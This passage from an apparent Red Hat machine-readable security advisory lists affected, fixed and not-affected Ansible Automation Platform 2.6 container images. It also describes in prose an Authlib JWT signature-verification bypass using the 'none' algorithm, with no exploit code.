"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
